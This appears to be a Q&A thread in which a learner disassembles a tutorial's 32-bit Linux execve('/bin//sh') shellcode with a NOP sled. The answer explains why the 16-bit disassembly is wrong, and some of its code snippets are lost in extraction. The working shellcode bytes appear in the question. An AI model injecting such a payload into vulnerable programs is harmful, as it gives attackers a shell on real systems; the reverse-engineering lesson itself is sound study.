I am learning shellcodes.
I have found this shellcode in a tutorial:
python -c 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 "' > shellcode
What i want to do is to disassemble this very basic shellcode in order to understand how it works.
Here is what i done:
$ objdump -D -b binary -m i8086 shellcode
shellcode: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 90 nop
1: 90 nop
2: 90 nop
3: 90 nop
4: 90 nop
5: 90 nop
6: 90 nop
7: 90 nop
8: 90 nop
9: 31 c0 xor %ax,%ax
b: 50 push %ax
c: 68 2f 2f push $0x2f2f
f: 73 68 jae 0x79
11: 68 2f 62 push $0x622f
14: 69 6e 89 e3 50 imul $0x50e3,-0x77(%bp),%bp
19: 53 push %bx
1a: 89 e1 mov %sp,%cx
1c: b0 0b mov $0xb,%al
1e: cd 80 int $0x80
Or:
$ ndisasm shellcode
00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 90 nop
00000009 31C0 xor ax,ax
0000000B 50 push ax
0000000C 682F2F push word 0x2f2f
0000000F 7368 jnc 0x79
00000011 682F62 push word 0x622f
00000014 696E89E350 imul bp,[bp-0x77],word 0x50e3
00000019 53 push bx
0000001A 89E1 mov cx,sp
0000001C B00B mov al,0xb
0000001E CD80 int 0x80
This shellcode contains strings which are interpreted as x86 instructions. Is there a way to put proper labels on jumps ?
And is there a way to display strings instead of decoding x86 instructions on strings. I know this is not easy because there is no elf with sections and headers...
If you had shellcode which used
call
orjmp
to jump over some data, you'd have to replace the strings with NOPs if the disassembler got out of sync while treating the data as instructions, as @DavidJ suggested.In this case, you're just disassembling in the wrong mode. The
jnc
is clearly bogus (as I think you realized).The disassembler is treating the
push
opcode (the0x68
byte) as the start ofpush imm16
, because that's how 16-bit mode works. But in 32 and 64-bit modes, the same opcode is the start of apush imm32
. Sopush
instruction is actually 5 bytes instead of 3, and the next instruction is actually the nextpush
.The bogus short-
jnc
is a huge hint that this is not 16-bit code.Use
ndisasm -b32
or-b64
. Ndisasm can read input from stdin, so I usedpython2 -c 'print "... "' | ndisasm - -b32
.When using
objdump
, if you prefer Intel syntax, useobjdump -d -Mintel
. So you couldobjdump -Mintel -bbinary -D -mi386 /tmp/shellcode
for 32-bit (-mi386
selects x86 as the architecture (rather than ARM or MIPS or whatever), and implies-Mi386
32-bit mode as well).Or for 64-bit,
objdump -D -b binary -mi386 -Mx86-64 /tmp/shellcode
works. (objdump
won't read the binary from stdin :/) Check theobjdump
man page for more about-M
options.I use this alias in my
~/.bashrc
:alias disas='objdump -drwC -Mintel'
, because I normally disassemble ELF executables / objects to see what a compiler did, not shellcode. You might want-D
in your alias.I'm pretty sure this is 32-bit code, because in 64-bit mode the two pushes would leave a gap. The is no
push imm64
, butpush imm32
is a 64-bit push with the immediate sign-extended to 64 bits. In 64-bit mode, you might useto end up with rsp pointing to
"abcdefgh"
.Also, the use of
int 0x80
with a stack address is a big clue this is not 64-bit code.int 0x80
works on Linux in 64-bit mode, but it truncates all inputs to 32-bit: What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?The 32-bit disassembly from ndisasm is:
Which looks sane. It contains no branches, but
Yes, Agner Fog's
objconv
disassembler can put labels on branch targets to help you figure out which branch goes where. See How do I disassemble raw x86 code?